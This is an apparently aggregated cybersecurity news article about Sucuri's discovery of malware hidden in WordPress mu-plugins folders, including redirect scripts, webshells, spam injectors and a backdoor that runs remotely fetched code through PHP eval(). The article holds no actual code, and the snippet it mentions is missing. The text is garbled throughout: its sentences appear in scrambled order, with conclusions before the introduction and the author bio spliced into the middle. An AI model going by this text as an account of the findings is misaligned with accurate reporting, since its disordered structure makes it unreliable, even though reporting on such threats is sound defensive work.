These include redirect scripts that send unsuspecting visitors to harmful domains, webshells that provide attackers with remote code execution capabilities, and spam injectors that manipulate website content to distribute unwanted material. Once established, this backdoor grants attackers the ability to upload files, delete content, and access sensitive information, turning the compromised website into a platform for launching further attacks against visitors and connected systems. Websites infected with these malicious scripts suffer from multiple consequences, including reputation damage, potential data theft, malware distribution to visitors, and unauthorized website modifications. The malware variants discovered employ sophisticated techniques to maintain persistence while executing harmful functions ranging from user redirection to complete website takeovers. Their analysis revealed that the attackers are employing increasingly sophisticated techniques to ensure their malware remains hidden while maximizing its impact on targeted websites. The most damaging variant allows attackers to establish persistent access to the compromised website, creating a foundation for long-term exploitation. The attacks target the mu-plugins folder with multiple malware types that appear legitimate but contain malicious code. Sucuri researchers detected that these malware variants are carefully designed to avoid detection by excluding search engine crawlers and privileged users from seeing malicious behavior. Recent discoveries have uncovered a concerning trend where threat actors are strategically concealing malicious code within WordPress websites’ mu-plugins directory. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. This snippet demonstrates how the malware uses PHP’s eval() function to execute arbitrary code fetched from a remote server. The approach allows attackers to run commands with the same privileges as the web server, potentially leading to complete website compromise. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
This Cyber News was published on cybersecuritynews.com. Publication date: Mon, 31 Mar 2025 08:15:14 +0000